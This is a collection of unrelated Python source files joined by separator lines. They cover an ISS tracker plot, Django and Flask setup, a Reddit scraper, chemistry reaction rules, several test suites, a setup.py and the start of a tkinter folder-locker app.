sys.exit()
if start_time is None: # ensure single time usage
start_time = t
past_loc.append(pt) # saving to past location
# printing information in console
print(f'Timestamp: {time.ctime(t)}\tLatitude: {pt[1]}\tLongitude: {pt[0]}')
# setting title of the plot (dynamic timing)
ax.set_title('World Map\n'+'(Started on: '+time.ctime(start_time)+')\n\nInternational Space Station live Location at '+time.ctime(t))
# annonating iss icon
ab = AnnotationBbox(im, pt, xycoords='data', frameon=False)
ax.add_artist(ab)
# annonating lngitude and latitude
tx = TextArea(f"({append_deg(pt[0], 'W', 'E')}, {append_deg(pt[1], 'S', 'N')})")
ab2 = AnnotationBbox(tx, (pt[0], pt[1]-10), xycoords='data', frameon=False)
ax.add_artist(ab2)
# plotting past point
plt.scatter(past_loc[-1][0], past_loc[-1][1], c='r', s=3, alpha=0.9)
plt.pause(5)
# TODO: exit if plot is closed - needs to be fixed
if not plt.fignum_exists(fig_num):
if not os.path.exists('saved_runs'):
os.mkdir('saved_runs')
loc = os.path.join('saved_runs', f'run{start_time}')
print(f'Saving plot as: {loc}')
fig.savefig(loc)
sys.exit()
ab.remove() # remove previous iss icon
ab2.remove() # remove previous latitude, longitude annonate
|
from django.urls import path
from . import views
app_name = 'geonames_place'
urlpatterns = [
path('place_autocomplete/', views.PlaceAutocompleteJsonView.as_view(),
name='place_autocomplete'),
]
|
import json
import requests
from xmltodict import parse
from datetime import datetime
testURL="https://dev.libraries.ou.edu/api-dsl/data_store/data/congressional/hearings/?format=json"
s = requests.session()
r = s.get(testURL).text
dateList =[]
htmlList = []
rjson = json.loads(r)
for x in rjson['results']:
for y in x['mods']['extension']:
if "heldDate" in y:
if type(y['heldDate'])== list:
dateList.append(y['heldDate'][1])
else:
dateList.append(y['heldDate'])
for x in rjson['results']:
for y in x['mods']['location']['url']:
if y['displayLabel'] == "HTML rendition":
htmlList.append(y['text'])
for i,url in enumerate(htmlList):
y = datetime.strptime(dateList[i],"%Y-%m-%d")
sdate = y.strftime("%B %d, %Y")
print sdate,url
|
n1 = int ( input ('Digite um número: ')
n2 = int ( input('Digite mais um número: ')
s = n1 + n2
print('a soma vale', s)
|
#!/usr/bin/python
# coding: utf-8
r"""geom/vector.py
"""
from __future__ import division
import logging
import numpy as np
import OCC.gp
import aocutils.tolerance
import aocutils.exceptions
import aocutils.geom._three_d
logger = logging.getLogger(__name__)
class Vector(aocutils.geom._three_d.ThreeD):
r"""3D vector
Can be constructed from 3 parameters or from a tuple of length 3
Examples
--------
"""
@classmethod
def from_points(cls, start, end):
r"""Create the vector from 2 points
Parameters
----------
start : Point
end : Point
"""
obj = cls()
obj._x = end.X() - start.X()
obj._y = end.Y() - start.Y()
obj._z = end.Z() - start.Z()
return obj
@classmethod
def from_gp_vec(cls, gp_vec):
obj = cls()
obj._x = gp_vec.X()
obj._y = gp_vec.Y()
obj._z = gp_vec.Z()
return obj
@property
def gp_vec(self):
return OCC.gp.gp_Vec(self.X(), self.Y(), self.Z())
@property
def norm(self):
return (self.X()**2 + self.Y()**2 + self.Z()**2)**.5
def to_array(self):
r"""Convert the vector to an array"""
return [self.X(), self.Y(), self.Z()]
def perpendicular(self, other):
r"""Vector perpendicular to self and other
Parameters
----------
other : Vector
The other vector used to compute the perpendicular
"""
if other.norm == 0 or self.norm == 0:
raise aocutils.exceptions.ZeroNormVectorException
return Vector.from_tuple(np.cross(self.to_array(), other.to_array()))
def __add__(self, other):
r"""Add a vector to self
Parameters
----------
other : OCC.gp.gp_Vec or Vector
Returns
-------
Vector
"""
return Vector.from_xyz(self.X() + other.X(), self.Y() + other.Y(), self.Z() + other.Z())
def __sub__(self, other):
r"""Substract a vector to self
Parameters
----------
other : OCC.gp.gp_Vec or Vector
Returns
-------
Vector
"""
return Vector.from_xyz(self.X() - other.X(), self.Y() - other.Y(), self.Z() - other.Z())
def __mul__(self, scalar):
r"""Multiply a vector by a scalar
Parameters
----------
scalar_ : float
Returns
-------
Vector
"""
return Vector.from_xyz(self.X() * scalar, self.Y() * scalar, self.Z() * scalar)
def __div__(self, scalar):
r"""Multiply a vector by a scalar
Parameters
----------
scalar : float
Returns
-------
Vector
"""
return Vector.from_xyz(self.X() / scalar, self.Y() / scalar, self.Z() / scalar)
def __eq__(self, other):
r"""Is self equal to other?
Parameters
----------
other : OCC.gp.gp_Pnt or Point
Returns
-------
bool
"""
if isinstance(other, Vector):
return self.gp_vec.IsEqual(other.gp_vec, aocutils.tolerance.OCCUTILS_DEFAULT_TOLERANCE)
elif isinstance(other, OCC.gp.gp_Pnt):
return self.gp_vec.IsEqual(other, aocutils.tolerance.OCCUTILS_DEFAULT_TOLERANCE)
else:
msg = "Incompatible vector geom_type for comparison"
logger.critical(msg)
raise TypeError(msg)
def to_dir(self):
r"""Convert a gp_Vec to a gp_Dir
Returns
-------
OCC.gp.gp_Dir
"""
return OCC.gp.gp_Dir(self.gp_vec)
|
import praw
import json
import logging
from concurrent.futures import ThreadPoolExecutor
from .constants import USER_AGENT, BOT_NAME
from ..db import (
create_event,
create_job,
set_job_status,
get_or_create_subreddit,
Event,
SubredditActions,
SubredditFilters,
JobStatus,
Job,
Subreddit
)
from ..quote_generator import generate_complete_model, find_substring
#model = generate_complete_model()
logger = logging.getLogger(__name__)
def json_log(json_obj, log_level='INFO', **json_kwargs):
method = getattr(logger, log_level.lower())
method(json.dumps(json_obj, **json_kwargs))
def get_reddit():
return praw.Reddit(BOT_NAME, user_agent=USER_AGENT)
class RedditJobRunner:
def __init__(self, subreddit_name, action, subreddit_filter='hot'):
self.subreddit = get_or_create_subreddit(subreddit_name)
self.job = create_job(self.subreddit.name, action, subreddit_filter=subreddit_filter)
self.event(f'Job {self.job.uuid} started')
self.job_started()
def dispatch(self):
if self.job.action == SubredditActions.scrape:
self.do_scrape()
elif self.job.action == SubredditActions.comment:
self.do_comment()
def get_submissions(self):
submissions = subreddit_top_n(
self.job.subreddit.name,
self.job.filter,
self.job.scrape_count or 1
)
self.event(f'Fetched submissions from subreddit {self.subreddit.name}')
return submissions
def do_scrape(self):
try:
for submission in self.get_submissions():
self.process_submission(submission)
except Exception as e:
self.event(f'Error: {str(e)}')
logger.exception(str(e))
self.job_error()
else:
self.event(f'Job {self.job.uuid} Completed')
self.job_complete()
def process_submission(self, submission):
for comment in submission.comments:
if len(comment.body) < 50:
continue
path, text = find_substring(comment.body[:50])
if path:
self.event(f'Found comment {comment.name} in {path}: {text}')
def do_comment(self):
pass
def event(self, message):
return create_event(message=message, job=self.job)
def job_complete(self):
set_job_status(self.job, JobStatus.complete)
def job_started(self):
set_job_status(self.job, JobStatus.started)
def job_error(self):
set_job_status(self.job, JobStatus.error)
def subreddit_top_n(subreddit_name, subreddit_filter='hot', n=5):
reddit = get_reddit()
subreddit = reddit.subreddit(subreddit_name)
items = getattr(subreddit, subreddit_filter)(limit=n)
return [{s.title: (f'u/{s.author}', s.score)} for s in items]
def test_task():
top_5 = subreddit_top_n('television')
return create_event(f'Fetched {len(top_5)} submissions')
|
"""
An anchor's behavior is a cascading list of Attrs where the hooks/pipelines/etc
are carried from each class to its subclasses.
Implicit in discussing anchors is class hierarchy. We use the terms parent/child
where child is always the current context. Which means that we don't touch the
child when processing the parent. We always process the class dicts root down.
"""
from collections import defaultdict, OrderedDict
from types import FunctionType
from ..pattern_match import pattern
from .attr import Attr
from ..meta import MetaMeta
class AnchorFuncError(Exception):
pass
class InvalidAnchorOverrideError(Exception):
pass
class AnchorFunc:
"""
Mark certain functions as being wrapped functions for an Attr.
Instead of:
```
def some_hook(self):
yield
__init__ = Attr()
__init__.add_hook(some_hook)
```
we can do:
```
@hook('__init__')
def some_hook(self):
yield
"""
def __init__(self, name):
self.name = name
def __call__(self, func):
self.func = func
return self
class hook(AnchorFunc): pass
class pipeline(AnchorFunc): pass
class transform(AnchorFunc): pass
def add_to_attr(attr, func):
""" utility func to add AnchorFunc to an Attr """
assert isinstance(func, AnchorFunc)
anchor_func_type = func.__class__.__name__
adder = getattr(attr, 'add_{type}'.format(type=anchor_func_type))
adder(func.func)
return attr
def _parent_anchors(bases):
if not bases:
return {}
base_dict = bases[0].__dict__
return {k:v for k, v in base_dict.items() if isinstance(v, Attr)}
def _get_anchor_name(k, v):
anchor_name = k
if isinstance(v, AnchorFunc):
anchor_name = v.name
return anchor_name
def _validate_funcs(funcs):
if len(funcs) == 1:
return True
# Attr can be first entry. Cannot occur after a AnchorFunc.
is_attr = lambda obj: isinstance(obj, Attr)
if any(map(is_attr, funcs[1:])):
raise AnchorFuncError("Cannot have a Attr after AnchorFuncs")
def _reduce_anchor_funcs(funcs):
"""
Merge a list of AnchorFuncs into an Attr. If the first element is
an Attr, then we merge into that Attr.
"""
_validate_funcs(funcs)
if isinstance(funcs, Attr):
return funcs
attr = Attr()
if isinstance(funcs[0], Attr):
attr = funcs[0]
funcs = funcs[1:]
for func in funcs:
add_to_attr(attr, func)
return attr
def _aggregate_anchor_funcs(dct):
""" aggregate a class dict into single Attrs per name """
dct = filter(lambda x: isinstance(x[1], (Attr, AnchorFunc)), dct.items())
items = [(_get_anchor_name(k, v), v) for k, v in dct]
res = defaultdict(list)
for k, v in items:
res[k].append(v)
update = {k:_reduce_anchor_funcs(funcs) for k, funcs in res.items()}
return update
def _merge_parent_child_anchors(dct, bases):
"""
If the super class has an Attr, we're assuming it is an Anchor.
"""
update = OrderedDict()
for k, v in parent_anchors.items():
update[k] = propogate_anchor(dct, bases, k)
continue
return update
_missing = object()
@pattern
def _to_anchor(parent, child):
"""
if the parent_anchor is an Attr, we propogate it.
if the child is not also an Attr, then we assume something went wrong
the child class should know that it needs to be an Attr.
"""
meta [match : parent, child]
~ Attr, Attr | parent, child
~ Attr, _missing | parent, Attr()
~ Attr, FunctionType | parent, Attr(child)
~ _missing, Attr | Attr(), child # new anchor
def anchor_updates(dct, bases):
"""
Bases on the superclasses, generate a dict of new Attrs to
update the child dct. Basically creates a manifest of all
current anchors affecting the class.
For now we assume that anchors have been propogates properly to the
super classes, so this doesn't go up the mro to find anchors originally
defined in a grandparent class.
"""
parent_anchors = _parent_anchors(bases)
child_anchors = _aggregate_anchor_funcs(dct)
all_anchors = set(child_anchors) | set(parent_anchors)
update = {}
for name in all_anchors:
parent = parent_anchors.get(name, _missing)
child = child_anchors.get(name, _missing)
if child is _missing:
child = dct.get(name, _missing)
parent, child = _to_anchor(parent, child)
new_anchor = Attr.combine(parent, child)
update[name] = new_anchor
return update
class AnchorMeta(MetaMeta):
def __new__(cls, name, bases, dct):
update = anchor_updates(dct, bases)
dct.update(update)
return super().__new__(cls, name, bases, dct)
|
import uuid
import pytest
from prices import Money, TaxedMoney
from .....account.models import User
from .....order.models import Order
ORDER_COUNT_IN_BENCHMARKS = 10
@pytest.fixture
def users_for_benchmarks(address):
users = [
User(
email=f"john.doe.{i}@exmaple.com",
is_active=True,
default_billing_address=address.get_copy(),
default_shipping_address=address.get_copy(),
first_name=f"John_{i}",
last_name=f"Doe_{i}",
)
for i in range(ORDER_COUNT_IN_BENCHMARKS)
]
return User.objects.bulk_create(users)
@pytest.fixture
def orders_for_benchmarks(channel_USD, address, users_for_benchmarks):
orders = [
Order(
token=str(uuid.uuid4()),
channel=channel_USD,
billing_address=address.get_copy(),
shipping_address=address.get_copy(),
user=users_for_benchmarks[i],
total=TaxedMoney(net=Money(i, "USD"), gross=Money(i, "USD")),
)
for i in range(ORDER_COUNT_IN_BENCHMARKS)
]
return Order.objects.bulk_create(orders)
|
import os
from airflow.configuration import conf
from ewah.dag_factories import dags_from_yml_file
for dag in dags_from_yml_file(conf.get("core", "dags_folder") + os.sep + "dags.yml"):
# Must add the individual DAGs to the global namespace,
# otherwise airflow does not find the DAGs!
globals()[dag._dag_id] = dag
|
knoevenagel_c = ruleGMLString("""rule [
ruleID "Knoevenagel C"
labelType "term"
left [
edge [ source 1 target 2 label "=" ]
edge [ source 3 target 4 label "-" ]
]
context [
node [ id 1 label "C" ]
node [ id 2 label "O" ]
node [ id 3 label "C" ]
node [ id 4 label "H" ]
node [ id 5 label "*" ]
node [ id 6 label "C" ]
node [ id 7 label "C" ]
edge [ source 3 target 6 label "-" ]
edge [ source 3 target 7 label "-" ]
edge [ source 3 target 5 label "-" ]
]
right [
edge [ source 1 target 3 label "-" ]
edge [ source 1 target 2 label "-" ]
edge [ source 2 target 4 label "-" ]
]
# The C=O that merges should not be a part of a -(C=O)NH2, etc.
constrainAdj [ id 1 op "=" count 0
nodeLabels [ label "O" label "N" label "S" ]
edgeLabels [ label "-" ]
]
# The R can be either C#N or C=O
constrainAdj [ id 6 op "=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
constrainAdj [ id 7 op ">=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "-" label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
]""")
knoevenagel_h = ruleGMLString("""rule [
ruleID "Knoevenagel H"
labelType "term"
left [
edge [ source 1 target 2 label "=" ]
edge [ source 3 target 4 label "-" ]
]
context [
node [ id 1 label "C" ]
node [ id 2 label "O" ]
node [ id 3 label "C" ]
node [ id 4 label "H" ]
node [ id 5 label "*" ]
node [ id 6 label "C" ]
edge [ source 3 target 6 label "-" ]
edge [ source 3 target 5 label "-" ]
]
right [
edge [ source 1 target 3 label "-" ]
edge [ source 1 target 2 label "-" ]
edge [ source 2 target 4 label "-" ]
]
# The C=O that merges should not be a part of a -(C=O)NH2, etc.
constrainAdj [ id 1 op "=" count 0
nodeLabels [ label "O" label "N" label "S" ]
edgeLabels [ label "-" ]
]
# The R can be either C#N or C=O
constrainAdj [ id 6 op "=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
constrainAdj [ id 3 op ">=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "-" label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
]""")
knoevenagel_c_inv = ruleGMLString("""rule [
ruleID "Knoevenagel C (inverse)"
labelType "term"
left [
edge [ source 1 target 3 label "-" ]
edge [ source 1 target 2 label "-" ]
edge [ source 2 target 4 label "-" ]
]
context [
node [ id 1 label "C" ]
node [ id 2 label "O" ]
node [ id 3 label "C" ]
node [ id 4 label "H" ]
node [ id 5 label "*" ]
node [ id 6 label "C" ]
node [ id 7 label "C" ]
edge [ source 3 target 6 label "-" ]
edge [ source 3 target 7 label "-" ]
edge [ source 3 target 5 label "-" ]
]
right [
edge [ source 1 target 2 label "=" ]
edge [ source 3 target 4 label "-" ]
]
# The -OH should not be a part of a carboxylic acid
constrainAdj [ id 1 op "=" count 0
nodeLabels [ label "O" ]
edgeLabels [ label "=" ]
]
# The R can be either C#N or C=O
constrainAdj [ id 6 op "=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
constrainAdj [ id 7 op ">=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "-" label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
]""")
knoevenagel_h_inv = ruleGMLString("""rule [
ruleID "Knoevenagel H (inv)"
labelType "term"
left [
edge [ source 1 target 3 label "-" ]
edge [ source 1 target 2 label "-" ]
edge [ source 2 target 4 label "-" ]
]
context [
node [ id 1 label "C" ]
node [ id 2 label "O" ]
node [ id 3 label "C" ]
node [ id 4 label "H" ]
node [ id 5 label "*" ]
node [ id 6 label "C" ]
edge [ source 3 target 6 label "-" ]
edge [ source 3 target 5 label "-" ]
]
right [
edge [ source 1 target 2 label "=" ]
edge [ source 3 target 4 label "-" ]
]
# The -OH should not be a part of a carboxylic acid
constrainAdj [ id 1 op "=" count 0
nodeLabels [ label "O" ]
edgeLabels [ label "=" ]
]
# The R can be either C#N or C=O
constrainAdj [ id 6 op "=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
constrainAdj [ id 3 op ">=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "-" label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
]""")
|
#!/usr/bin/env python
from __future__ import absolute_import, print_function
import ssl
import time
import unittest
import libcloud.common.types as cloud_types
import mock
import arvnodeman.computenode.driver.ec2 as ec2
from . import testutil
class EC2ComputeNodeDriverTestCase(testutil.DriverTestMixin, unittest.TestCase):
TEST_CLASS = ec2.ComputeNodeDriver
def test_driver_instantiation(self):
kwargs = {'key': 'testkey'}
driver = self.new_driver(auth_kwargs=kwargs)
self.assertTrue(self.driver_mock.called)
self.assertEqual(kwargs, self.driver_mock.call_args[1])
def test_list_kwargs_become_filters(self):
# We're also testing tag name translation.
driver = self.new_driver(list_kwargs={'tag_test': 'true'})
driver.list_nodes()
list_method = self.driver_mock().list_nodes
self.assertTrue(list_method.called)
self.assertEqual({'tag:test': 'true'},
list_method.call_args[1].get('ex_filters'))
def test_create_image_loaded_at_initialization(self):
list_method = self.driver_mock().list_images
list_method.return_value = [testutil.cloud_object_mock(c)
for c in 'abc']
driver = self.new_driver(create_kwargs={'image_id': 'id_b'})
self.assertEqual(1, list_method.call_count)
def test_create_includes_ping_secret(self):
arv_node = testutil.arvados_node_mock(info={'ping_secret': 'ssshh'})
driver = self.new_driver()
driver.create_node(testutil.MockSize(1), arv_node)
create_method = self.driver_mock().create_node
self.assertTrue(create_method.called)
self.assertIn('ping_secret=ssshh',
create_method.call_args[1].get('ex_userdata',
'arg missing'))
def test_hostname_from_arvados_node(self):
arv_node = testutil.arvados_node_mock(8)
driver = self.new_driver()
self.assertEqual('compute8.zzzzz.arvadosapi.com',
driver.arvados_create_kwargs(testutil.MockSize(1), arv_node)['name'])
def test_default_hostname_from_new_arvados_node(self):
arv_node = testutil.arvados_node_mock(hostname=None)
driver = self.new_driver()
self.assertEqual('dynamic.compute.zzzzz.arvadosapi.com',
driver.arvados_create_kwargs(testutil.MockSize(1), arv_node)['name'])
def check_node_tagged(self, cloud_node, expected_tags):
tag_mock = self.driver_mock().ex_create_tags
self.assertTrue(tag_mock.called)
self.assertIs(cloud_node, tag_mock.call_args[0][0])
self.assertEqual(expected_tags, tag_mock.call_args[0][1])
def test_post_create_node_tags_from_list_kwargs(self):
expect_tags = {'key1': 'test value 1', 'key2': 'test value 2'}
list_kwargs = {('tag_' + key): value
for key, value in expect_tags.iteritems()}
list_kwargs['instance-state-name'] = 'running'
cloud_node = testutil.cloud_node_mock()
driver = self.new_driver(list_kwargs=list_kwargs)
driver.post_create_node(cloud_node)
self.check_node_tagged(cloud_node, expect_tags)
def test_sync_node(self):
arv_node = testutil.arvados_node_mock(1)
cloud_node = testutil.cloud_node_mock(2)
driver = self.new_driver()
driver.sync_node(cloud_node, arv_node)
self.check_node_tagged(cloud_node,
{'Name': 'compute1.zzzzz.arvadosapi.com'})
def test_node_create_time(self):
refsecs = int(time.time())
reftuple = time.gmtime(refsecs)
node = testutil.cloud_node_mock()
node.extra = {'launch_time': time.strftime('%Y-%m-%dT%H:%M:%S.000Z',
reftuple)}
self.assertEqual(refsecs, ec2.ComputeNodeDriver.node_start_time(node))
def test_node_fqdn(self):
name = 'fqdntest.zzzzz.arvadosapi.com'
node = testutil.cloud_node_mock()
node.name = name
self.assertEqual(name, ec2.ComputeNodeDriver.node_fqdn(node))
def test_cloud_exceptions(self):
for error in [Exception("test exception"),
IOError("test exception"),
ssl.SSLError("test exception"),
cloud_types.LibcloudError("test exception")]:
self.assertTrue(ec2.ComputeNodeDriver.is_cloud_exception(error),
"{} not flagged as cloud exception".format(error))
def test_noncloud_exceptions(self):
self.assertFalse(
ec2.ComputeNodeDriver.is_cloud_exception(ValueError("test error")),
"ValueError flagged as cloud exception")
|
import re
fname = input("Enter file: ")
fhand = open(fname)
numlist = list()
for line in fhand:
line = line.rstrip()
numStr = re.findall('^New Revision: ([0-9]+)', line)
if len(numStr) == 1:
num = float(numStr[0])
numlist.append(num)
print(sum(numlist)/len(numlist))
|
"""
Subpackage for future language-specific resources and annotators
"""
|
from ipaddress import ip_address
import six
from sqlalchemy import types
from ..exceptions import ImproperlyConfigured
from .scalar_coercible import ScalarCoercible
class IPAddressType(ScalarCoercible, types.TypeDecorator):
"""
Changes IPAddress objects to a string representation on the way in and
changes them back to IPAddress objects on the way out.
IPAddressType uses ipaddress package on Python >= 3 and ipaddr_ package on
Python 2. In order to use IPAddressType with python you need to install
ipaddr_ first.
.. _ipaddr: https://pypi.python.org/pypi/ipaddr
::
from sqlalchemy_utils import IPAddressType
class User(Base):
__tablename__ = 'user'
id = sa.Column(sa.Integer, autoincrement=True)
name = sa.Column(sa.Unicode(255))
ip_address = sa.Column(IPAddressType)
user = User()
user.ip_address = '123.123.123.123'
session.add(user)
session.commit()
user.ip_address # IPAddress object
"""
impl = types.Unicode(50)
cache_ok = True
def __init__(self, max_length=50, *args, **kwargs):
if not ip_address:
raise ImproperlyConfigured(
"'ipaddr' package is required to use 'IPAddressType' "
"in python 2"
)
super(IPAddressType, self).__init__(*args, **kwargs)
self.impl = types.Unicode(max_length)
def process_bind_param(self, value, dialect):
return six.text_type(value) if value else None
def process_result_value(self, value, dialect):
return ip_address(value) if value else None
def _coerce(self, value):
return ip_address(value) if value else None
@property
def python_type(self):
return self.impl.type.python_type
|
import pytest
pytest.importorskip("pytorch_lightning")
from pugh_torch.callbacks import TensorBoardAddClassification
from pugh_torch.utils import TensorBoardLogger
import torch
@pytest.fixture
def fake_batch():
x = torch.rand(5, 3, 224, 224)
torch.manual_seed(0)
y = torch.LongTensor([4, 3, 1, 0, 2, 9])
return x, y
@pytest.fixture
def fake_pl_module(mocker):
pl_module = mocker.MagicMock()
pl_module.last_logits = torch.rand(5, 10)
return pl_module
@pytest.fixture
def classes():
return ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]
@pytest.fixture
def fake_trainer(mocker):
trainer = mocker.MagicMock()
trainer.logger = mocker.MagicMock(TensorBoardLogger)
trainer.global_step = 5555
return trainer
def test_callback_action(mocker, tmp_path, fake_trainer, fake_batch, fake_pl_module):
callback = TensorBoardAddClassification()
fake_trainer.global_step = callback.logging_batch_interval
dataloader_idx = 0
callback.on_train_batch_end(
fake_trainer, fake_pl_module, [], fake_batch, 0, dataloader_idx
)
fake_trainer.logger.experiment.add_rgb.assert_called_once()
args, kwargs = fake_trainer.logger.experiment.add_rgb.call_args_list[0]
assert args[0] == "train/output"
assert (args[1] == fake_batch[0]).all()
assert kwargs["global_step"] == 20
assert kwargs["labels"] == [
"Truth: 4 (N/A)\nPred: 7 (N/A)",
"Truth: 3 (N/A)\nPred: 7 (N/A)",
"Truth: 1 (N/A)\nPred: 6 (N/A)",
"Truth: 0 (N/A)\nPred: 1 (N/A)",
"Truth: 2 (N/A)\nPred: 6 (N/A)",
]
def test_callback_skip(mocker, tmp_path, fake_batch, fake_trainer):
callback = TensorBoardAddClassification()
fake_trainer.global_step = callback.logging_batch_interval - 1
dataloader_idx = 0
callback.on_train_batch_end(
fake_trainer, fake_pl_module, [], fake_batch, 0, dataloader_idx
)
fake_trainer.logger.experiment.add_rgb.assert_not_called()
def test_callback_classes(
mocker, tmp_path, fake_trainer, fake_batch, fake_pl_module, classes
):
callback = TensorBoardAddClassification(classes=classes)
fake_trainer.global_step = callback.logging_batch_interval
dataloader_idx = 0
callback.on_train_batch_end(
fake_trainer, fake_pl_module, [], fake_batch, 0, dataloader_idx
)
fake_trainer.logger.experiment.add_rgb.assert_called_once()
args, kwargs = fake_trainer.logger.experiment.add_rgb.call_args_list[0]
assert args[0] == "train/output"
assert (args[1] == fake_batch[0]).all()
assert kwargs["global_step"] == 20
assert kwargs["labels"] == [
f"Truth: 4 ({classes[4]})\nPred: 7 ({classes[7]})",
f"Truth: 3 ({classes[3]})\nPred: 7 ({classes[7]})",
f"Truth: 1 ({classes[1]})\nPred: 6 ({classes[6]})",
f"Truth: 0 ({classes[0]})\nPred: 1 ({classes[1]})",
f"Truth: 2 ({classes[2]})\nPred: 6 ({classes[6]})",
]
|
import flask
from werkzeug.exceptions import NotFound
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import BadRequestKeyError
from .blueprints import api_v1
def create_app():
app = flask.Flask(__name__)
app.register_blueprint(api_v1.blueprint)
app.register_error_handler(NotFound, _not_found)
app.register_error_handler(BadRequest, _bad_request)
app.register_error_handler(BadRequestKeyError, _missing_parameter)
app.register_error_handler(Exception, _exception_handler)
return app
def _not_found(e):
message = 'resource not found'
return flask.jsonify(error=message), e.code
def _missing_parameter(e):
message = 'missing \'%s\' parameter' % e.args[0]
return flask.jsonify(error=message), e.code
def _bad_request(e):
return flask.jsonify(error=e.description), e.code
def _exception_handler(e):
flask.current_app.logger.exception(e)
return flask.jsonify(error=str(e)), 500
|
from swampdragon.serializers.model_serializer import ModelSerializer
from swampdragon.testing.dragon_testcase import DragonTestCase
from .models import SDModel
from django.db import models
class FooOne2One(SDModel):
name = models.CharField(max_length=20)
class BarOne2One(SDModel):
foo = models.OneToOneField(FooOne2One)
number = models.IntegerField()
class FooSerializer(ModelSerializer):
bar = 'BarSerializer'
class Meta:
model = FooOne2One
update_fields = ('name', 'bar')
class BarSerializer(ModelSerializer):
foo = FooSerializer
class Meta:
model = BarOne2One
update_fields = ('number', 'foo')
class TestModelSerializer(DragonTestCase):
def test_deserialize_with_one_2_one(self):
data = {
'name': 'foo',
'bar': {'number': 5}
}
serializer = FooSerializer(data)
foo = serializer.save()
self.assertEqual(foo.name, data['name'])
self.assertEqual(foo.bar.number, data['bar']['number'])
def test_deserialize_with_reverse_one_2_one(self):
data = {
'number': 123,
'foo': {'name': 'foo'}
}
serializer = BarSerializer(data)
bar = serializer.save()
self.assertEqual(bar.number, data['number'])
self.assertEqual(bar.foo.name, data['foo']['name'])
|
from pathlib import Path
from setuptools import setup, find_packages
package_dir = 'python_data_utils'
root = Path(__file__).parent.resolve()
# Read in package meta from about.py
about_path = root / package_dir / 'about.py'
with about_path.open('r', encoding='utf8') as f:
about = {}
exec(f.read(), about)
# Get readme
readme_path = root / 'README.md'
with readme_path.open('r', encoding='utf8') as f:
readme = f.read()
install_requires = [
'beautifulsoup4', 'dill', 'distance', 'fake-useragent',
'fuzzywuzzy', 'hdbscan', 'ipython', 'ipywidgets', 'joblib',
'matplotlib', 'nltk', 'numba', 'numpy', 'openpyxl',
'pandas', 'parse', 'progressbar2', 'pyppeteer>=0.0.14',
'pyquery', 'pyyaml', 'requests', 'scikit-learn', 'scipy',
'seaborn', 'urlclustering', 'w3lib'
]
test_requires = ['pytest']
extras_require = {
'spark': ['pyspark>=2.4.0,<3.0.0'],
'statsmodels': ['statsmodels']
}
setup(
name=about['__title__'],
description=about['__summary__'],
long_description=readme,
long_description_content_type='text/markdown',
author=about['__author__'],
author_email=about['__email__'],
url=about['__uri__'],
version=about['__version__'],
license=about['__license__'],
packages=find_packages(exclude=('tests*',)),
install_requires=install_requires,
test_requires=test_requires,
extras_require=extras_require,
zip_safe=True,
include_package_data=True,
classifiers=[
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering',
'Topic :: Software Development :: Libraries',
'Topic :: Utilities',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7'
]
)
|
#you will need to install keyring
from platform import system
import os
import tkinter.messagebox
import tkinter.simpledialog
from tkinter import *
from shutil import rmtree
import keyring
from hashlib import sha256
#generic names
FILENAME_USER = "folder_locker.v2.USER"
FILENAME_PASS = "folder_locker.v2.PASS"
GENUSER = os.getlogin()
root = Tk()
root.title("folder_locker")
root.iconbitmap(default="folder_locker.ico")
root.geometry("280x127")
root.configure(bg='white')
root.resizable(False, False)
def HASH(string):
return sha256(str(string).encode()).hexdigest()
def clear_root():
def f_Forget(window):
_list = window.winfo_children()
for item in _list:
if item.winfo_children():
_list.extend(item.winfo_children())
return _list
widget_list = f_Forget(root)
for item in widget_list:
item.destroy()
def main():
root.geometry("305x390")
root.configure(bg='grey')
root.deiconify()
def change_password():
try:
old_password = tkinter.simpledialog.askstring("old username", "please enter your old username: ")
if HASH(old_password) == keyring.get_password(FILENAME_PASS, GENUSER):
keyring.delete_password(FILENAME_PASS, GENUSER)
root.withdraw()
password = tkinter.simpledialog.askstring("password", "please choose a password: ", show="•")
root.deiconify()
keyring.set_password(FILENAME_PASS, GENUSER, HASH(password))
yes_or_no = tkinter.messagebox.askyesno("restart", "to save the changes. press 'ok' to close the program.")
if yes_or_no:
exit(0)
else:
tkinter.messagebox.showerror("error", "wrong password.")
except:
tkinter.messagebox.showinfo("error", "an error occurred when trying to change your password. ")
def change_username():
try:
old_username = tkinter.simpledialog.askstring("old username", "please enter your old username: ")
if HASH(old_username) == keyring.get_password(FILENAME_USER, GENUSER):
keyring.delete_password(FILENAME_USER, GENUSER)
root.withdraw()
username = tkinter.simpledialog.askstring("username", "please choose a username: ")
root.deiconify()
keyring.set_password(FILENAME_USER, GENUSER, HASH(username))
yes_or_no = tkinter.messagebox.askyesno("restart", "to save the changes. press 'ok' to close the program.")
if yes_or_no:
exit(0)
else:
tkinter.messagebox.showerror("error", "wrong username.")
except:
tkinter.messagebox.showinfo("error", "an error occurred when trying to change your username. ")
def change_working_directory():
try:
print(os.path.expanduser("~"))
new_working_directory = tkinter.simpledialog.askstring("change current working directory",
"enter your new working directory")
with open("fldrlck.setting", "w") as f:
f.write(new_working_directory)
f.close()
set_working_directory()
update_current_working_directory()
update_listbox()
except:
tkinter.messagebox.showinfo("error", "an error occurred when trying to change the working directory. ")
def set_working_directory():
global data
try:
with open("fldrlck.setting", "r") as f:
data2 = f.read()
if len(data2) == 0:
root.withdraw()
while True:
set_working_dir = tkinter.simpledialog.askstring("current working directory not set",
"please set a working directory. you can always change this. include full directory.")
if not os.path.exists(set_working_dir):
